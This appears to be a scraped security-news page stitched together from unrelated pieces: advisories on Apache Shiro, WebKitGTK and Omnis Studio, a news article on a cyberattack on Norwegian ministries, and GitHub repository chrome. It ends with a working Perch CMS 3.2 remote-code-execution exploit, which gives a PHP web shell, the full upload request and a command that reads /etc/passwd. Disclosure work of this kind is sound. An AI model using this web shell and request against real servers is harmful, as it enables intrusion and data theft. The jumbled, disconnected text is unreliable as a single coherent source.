Apache Shiro, before 1.12.0 or 2.0.0-alpha-3, may be susceptible to a path traversal attack that results in an authentication bypass when used together with APIs or other web frameworks that route requests based on non-normalized requests.

Mitigation: Update to Apache Shiro 1.12.0+ or 2.0.0-alpha-3+


**Path Traversal in Apache Shiro**

Moderate severity GitHub Reviewed Published Jul 24, 2023 to the GitHub Advisory Database • Updated Jul 25, 2023

GHSA-pmhc-2g4f-85cg: Path Traversal in Apache Shiro

A cross-site scripting (XSS) vulnerability in SeedDMS v6.0.15 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

CVE-2021-39421

A cross-site scripting (XSS) vulnerability in Assembly Software Trialworks v11.4 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the asset src parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-37613: CVEs/CVE-2023-37613/Trialworks.md at main · HeidiSecurities/CVEs

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-34478

By Habiba Rashid
The cyberattack was discovered earlier this month.
This is a post from HackRead.com Read the original post: Norway Probes Major Cyberattack on 12 Government Ministries

According to local media, the cyberattack on the Norwegian ministries was made possible after unknown attackers exploited a new patch 0-day vulnerability.

Norwegian authorities are currently conducting a thorough investigation into a large-scale cyberattack that has targeted twelve government ministries. The attack, which was discovered earlier this month, has raised concerns about the nation’s cybersecurity readiness and the potential implications for sensitive government data.

Erik Hope, Director of the Norwegian ministries’ security and service organization, addressed the media during a press briefing, revealing that the attackers exploited a previously unknown vulnerability in the software of one of their suppliers.

> “We have uncovered a previously unknown vulnerability in the software of one of our suppliers,” said Hope. “This vulnerability has been exploited by an unknown actor. We have now closed this vulnerability. It is too early to say anything about who is behind it and the scale of the attack. Our investigations and the police’s investigation will be able to provide more answers.”
> 
> Erik Hope

As of now, the Norwegian Data Protection Authority has been notified to address any privacy concerns arising from the incident.

While the attack has caused disruptions in the affected ministries, the government’s core operations have remained largely unaffected. The Prime Minister’s services, defense, foreign affairs, and justice departments were shielded from the attack as they operate on separate and secure platforms.

Workers in the affected ministries have encountered challenges when trying to access standard mobile services, including email. However, officials have assured the public that essential government functions are continuing without interruption.

In a comment on the incident, Chris Hauk, consumer privacy champion at Pixel Privacy, told Hackread.com that “This incident emphasises how important it is for organisations to not only keep their own systems and software updated to plug security holes but to do regular supply chain checks to make sure all other organisations in the chain are also performing regular updates and security checks on a regular basis.”

“I do admire how the government official, Eric Hope, didn’t offer up the usual platitudes we hear after data breaches. Instead, he laid it out as “We screwed up, and now it’s fixed.” That’s refreshing,” Hauk added.

Elliott Wilkes, chief technology officer at Advanced Cyber Defence Systems (ACDS), also commented on the cyberattack stating, “While details on the latest attack are limited, it does appear that business systems like email were affected for up to a dozen government agencies in Norway. This is yet another reminder of the urgency needed to assess and mitigate security vulnerabilities in suppliers, as this attack has been attributed to a weakness in an IT supplier.”

Wilkes warned that _“_With the MOVEit attack earlier this year and countless others like the VMware attacks and SolarWinds, it is crucial that organisations regularly review the permissions and privileges granted to systems and software they use. Limiting access, relying on the principles of least privilege and just-in-time access provisioning (versus having an admin account used every day for all non-admin functions) are some of the ways businesses and government teams can mitigate risks posed by vulnerabilities in suppliers’ tools.”

Norway’s vulnerability to cyber threats has been evident in recent times. In 2020 and 2021, the Norwegian Parliament experienced cyberattacks, with some of them being attributed to Russian hackers.

Earlier this month, the Norwegian Refugee Council also reported a cyberattack targeting a database containing the personal information of project participants, adding to the growing concerns over the nation’s cybersecurity landscape.

The investigation into the current cyberattack is ongoing, and authorities are implementing additional measures to bolster their cybersecurity defences. With cyber threats on the rise globally, Norway’s authorities are treating the incident with utmost seriousness and vigilance.

As the situation unfolds, government officials and cybersecurity experts are closely monitoring the situation to ascertain the full extent of the breach and identify those responsible for the attack.

**RELATED ARTICLES**

1.  SmugX: Chinese Hackers Targeting Embassies in Europe
2.  Chinese Group Storm-0558 Hacked European Govt Emails
3.  Killnet Hits European Parliament Website with DDoS Attack

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Norway Probes Major Cyberattack on 12 Government Ministries

Atera Agent through 1.8.3.6 on Windows Creates a Temporary File in a Directory with Insecure Permissions.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

mandiant / **Vulnerability-Disclosures** Public

*   Notifications
*   Fork 51
*   Star 146
    

146 stars 51 forks Activity

Star

Notifications

*   Code
*   Issues 3
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

master

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

Aaron Carreras Add Atera CVE-2023-26077 and CVE-2023-26078 for Andrew Oliveau.

79876c5

Jul 24, 2023

Add Atera CVE-2023-26077 and CVE-2023-26078 for Andrew Oliveau.

79876c5

**Git stats**

*   **134** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

2022

2023

FEYE-2019-0001

FEYE-2019-0002

FEYE-2019-0003

FEYE-2019-0004

FEYE-2019-0005

FEYE-2019-0006

FEYE-2019-0007

FEYE-2019-0008

FEYE-2019-0009

FEYE-2019-0010

FEYE-2019-0011

FEYE-2019-0012

FEYE-2019-0013

FEYE-2019-0014

FEYE-2019-0015

FEYE-2020-0001

FEYE-2020-0002

FEYE-2020-0003

FEYE-2020-0004

FEYE-2020-0005

FEYE-2020-0006

FEYE-2020-0007

FEYE-2020-0008

FEYE-2020-0009

FEYE-2020-0010

FEYE-2020-0011

FEYE-2020-0012

FEYE-2020-0013

FEYE-2020-0014

FEYE-2020-0015

FEYE-2020-0016

FEYE-2020-0017

FEYE-2020-0018

FEYE-2020-0019

FEYE-2020-0020

FEYE-2021-0001

FEYE-2021-0002

FEYE-2021-0003

FEYE-2021-0004

FEYE-2021-0005

FEYE-2021-0006

FEYE-2021-0007

FEYE-2021-0008

FEYE-2021-0009

FEYE-2021-0010

FEYE-2021-0011

FEYE-2021-0012

FEYE-2021-0013

FEYE-2021-0014

FEYE-2021-0015

FEYE-2021-0016

FEYE-2021-0017

FEYE-2021-0018

FEYE-2021-0019

FEYE-2021-0020

FEYE-2021-0021

FEYE-2021-0022

FEYE-2021-0023

FEYE-2021-0024

FEYE-2021-0025

MNDT-2021-0001

MNDT-2021-0002

MNDT-2021-0003

MNDT-2021-0004

MNDT-2021-0005

MNDT-2021-0006

MNDT-2021-0007

MNDT-2021-0008

MNDT-2021-0009

MNDT-2021-0010

MNDT-2021-0011

MNDT-2021-0012

README.md

**README.md**

**Mandiant Vulnerability Disclosures**

This repository details vulnerabilities disclosed by Mandiant. These vulnerabilities were discovered by internal research, through Red Team assessments, or in use in the wild. Proof of concepts (PoCs) may or may not be provided.

The following _licenses/licensing_ apply to this Mandiant repository:

1.  CC BY-SA 4.0 - For CVE related information not including source code (such as PoCs)
2.  MIT - For source code contained within provided CVE information

Mandiant coordinates and handles Vulnerability Disclosures in accordance with Google's Vulnerability Disclosure Policy.

**About**

No description, website, or topics provided.

**Resources**

Readme

Activity

**Stars**

**146** stars

**Watchers**

**26** watching

**Forks**

**51** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published  

**Contributors 4**

*    **RonnieSalomonsen** Ronnie Salomonsen
*    **aaronc100** Aaron Carreras
*    **attritionorg** Jericho
*    **ziadhany** ziad hany

**Languages**

*   C++ 100.0%

CVE-2023-26077: GitHub - mandiant/Vulnerability-Disclosures

Debian Linux Security Advisory 5457-1 - An anonymous researcher discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5457-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
July 22, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-37450

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-37450

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution. Apple is aware of a report that  
    this issue may have been actively exploited.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.40.3-2~deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.40.3-2~deb12u2.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmS7l4cACgkQAAyEYu0C  
2AJr/BAAnyKHOHxiOroDoQHyo/DrX4rS7UTRb3TQKmgxxlehEAm40lO7jMTG1HLD  
HW8v7Jk9dguaqD4pV09rR3lfFrHb24jzyPZs07sQ3m1c9JQUXJybcsCkbLZlXH/V  
BHiv/oUjLK6FW4lHzhx3YjJ1kw9V9w5VO1neTjP4N9PK9TSGmZyPeHFlWG/Rq9fN  
jDU2PdS48TZK3enBfGEcaKOUcdxUsqWIIRh8nJY1EXVXUpmujjb8oJEHltNlSoe7  
NGmaWsPmpRz71JYkFVzRRwcxqa1UEi4abMy9VHzPgcGomLXESbDhlZYGLPMmhV5s  
lV6w73j1qDTpDZrsB7klm/MoABkqED6gwg1GktwmOFC07hC2PQt1Kd5ubQGX041k  
0XCKf+JavPDsYgN2FV9BsuOvDXJX2hf21jcgw/M7nX0byVEpG+rZrzdecEPMND8I  
+v0Lugs8D+Zg/80QaVqhA1hTQcwJgZVDn2GhB+8GfB4i0zhERHugkQsjCMIgkeh3  
XQw8dXixJNCCG3S6G63lJaRgKyw2lDlG1yYuEgQlXvxsopIHc9Itt71sPgTd5Fsk  
nvXiwMRkuqmytbOIcfaaIqPAe146l6O22sGICeYU59GdoEWcSstQCO6Gd1PJDJ8I  
8h4IFTwxPGbVq5WIyX8mogK/n8FTPb788HrYcK/NLcCu5Kh23xY=  
=g6Fh  
-----END PGP SIGNATURE-----

Debian Security Advisory 5457-1

Omnis Studio version 10.22.00 suffers from a locked class bypass vulnerability.

Advisory ID:               SYSS-2023-006  
Product:                   Omnis Studio  
Manufacturer:              Omnis Software Ltd.  
Affected Version(s):       10.22.00  
Tested Version(s):         10.22.00  
Vulnerability Type:        Expected Behavior Violation (CWE-440)  
Risk Level:                Low  
Solution Status:           Open  
Manufacturer Notification: 2023-03-30  
Solution Date:             -  
Public Disclosure:         2023-07-20  
CVE Reference:             CVE-2023-38334  
Author of Advisory:        Matthias Deeg (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Omnis Studio is a rapid application development tool for developing  
cross-platform software applications.

The manufacturer describes the product as follows:

"Omnis Studio is a powerful development environment that lets you deploy  
apps to virtually any device, on any platform, including tablets,  
smartphones, and desktop computers."[1]

Due to implementation issues, locked classes in Omnis libraries can be  
unlocked and thus further analyzed and modified via the Omnis Studio  
browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Omnis Studio supports an irreversible feature for locking classes within  
Omnis libraries.

According to the Omnis Studio software, it should be no longer possible  
to delete, view, change, copy, rename, duplicate, or print a locked  
class.

However, during a security analysis of an application developed with  
Omnis Studio using this feature, Matthias Deeg found out that it is  
possible to unlock previously locked classes of Omnis libraries, for  
instance by simply bypassing specific checks in Omnis Studio.

This allows for further analyzing and also deleting, viewing, changing,  
copying, renaming, duplicating, or printing previously locked Omnis  
classes.

This violates the expected behavior of an "irreversible operation".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For demonstrating the described security issue, Matthias Deeg developed  
a proof-of-concept software tool which allows unlocking locked classes  
within Omnis libraries and further analyzing and modifying them within  
Omnis Studio.

 >OmnisUnlocker.exe

 _____________________________________________________________  
                /    _____       _____ _____   
      \  
               /    /  ___|     /  ___/  ___|   
       \  
              |     \ `--. _   _\ `--.\ `--.   
        |  
              |      `--. \ | | |`--. \`--. \   
        |  
              |     /\__/ / |_| /\__/ /\__/ /   
        |  
               \    \____/ \__, \____/\____/   ... unlocks Omnis Studio!   
       /  
                \          __/ |   
      /  
                /         |___/   
__________________________________________/  
               / _________________/  
         (__) /_/  
         (oo)  
   /------\/  
  / |____||  
*  ||   ||  
    ^^   ^^  
SySS Omnis Unlocker v1.0 by Matthias Deeg <matthias.deeg@syss.de> - (c) 2023

[+] The Omnis Studio process was patched successfully.  
     Now you can:  
         * load private Omnis libraries in the browser, and  
         * analyze locked classes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-03-30: Vulnerability reported to manufacturer  
2023-04-06: Vulnerability reported to manufacturer again  
2023-07-20: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Omnis Studio  
     https://www.omnis.net/  
[2] SySS Security Advisory SYSS-2023-006

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-006.txt  
[3] SySS GmbH, SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de  
Public Key:   
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc  
Key Fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Omnis Studio 10.22.00 Library Unlock

Omnis Studio version 10.22.00 suffers from a private library access bypass vulnerability.

Advisory ID:               SYSS-2023-005  
Product:                   Omnis Studio  
Manufacturer:              Omnis Software Ltd.  
Affected Version(s):       10.22.00  
Tested Version(s):         10.22.00  
Vulnerability Type:        Expected Behavior Violation (CWE-440)  
Risk Level:                Low  
Solution Status:           Open  
Manufacturer Notification: 2023-03-30  
Solution Date:             -  
Public Disclosure:         2023-07-20  
CVE Reference:             CVE-2023-38335  
Author of Advisory:        Matthias Deeg (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Omnis Studio is a rapid application development tool for developing  
cross-platform software applications.

The manufacturer describes the product as follows:

"Omnis Studio is a powerful development environment that lets you deploy  
apps to virtually any device, on any platform, including tablets,  
smartphones, and desktop computers." [1]

Due to implementation issues, "always private" Omnis libraries can be  
opened by the Omnis Studio browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Omnis Studio supports a feature for making Omnis libraries "always  
private".

Making an Omnis library "always private" is supposed to be an  
irreversible operation according to the Omnis Studio software.

However, during a security analysis of an application developed with  
Omnis Studio using this feature, Matthias Deeg found out that it is  
still possible to load "always private" Omnis libraries with the Omnis  
Studio browser by simply bypassing a specific check.

This violates the expected behavior of an "irreversible operation".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For demonstrating the described security issue, Matthias Deeg developed  
a proof-of-concept software tool which allows loading private Omnis  
libraries in the Omnis Studio browser.

 >OmnisUnlocker.exe

 _____________________________________________________________  
                /    _____       _____ _____   
      \  
               /    /  ___|     /  ___/  ___|   
       \  
              |     \ `--. _   _\ `--.\ `--.   
        |  
              |      `--. \ | | |`--. \`--. \   
        |  
              |     /\__/ / |_| /\__/ /\__/ /   
        |  
               \    \____/ \__, \____/\____/   ... unlocks Omnis Studio!   
       /  
                \          __/ |   
      /  
                /         |___/   
__________________________________________/  
               / _________________/  
         (__) /_/  
         (oo)  
   /------\/  
  / |____||  
*  ||   ||  
    ^^   ^^  
SySS Omnis Unlocker v1.0 by Matthias Deeg <matthias.deeg@syss.de> - (c) 2023

[+] The Omnis Studio process was patched successfully.  
     Now you can:  
         * load private Omnis libraries in the browser, and  
         * analyze locked classes.

This security issue is also demonstrated in our SySS Proof of Concept  
Video "Reversing the Irreversible - Part I" on our YouTube channel [3].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-03-30: Vulnerability reported to manufacturer  
2023-04-06: Vulnerability reported to manufacturer again  
2023-07-20: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Omnis Studio  
     https://www.omnis.net/  
[2] SySS Security Advisory SYSS-2023-005

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-005.txt  
[3] SySS Proof of Concept Video: Reversing the Irreversible - Part I  
     https://www.youtube.com/watch?v=2fjMgPqjobQ  
[4] SySS GmbH, SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de  
Public Key:   
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc  
Key Fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Omnis Studio 10.22.00 Library Setting Bypass

Perch version 3.2 suffers from a remote code execution vulnerability.

    Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Tag

#web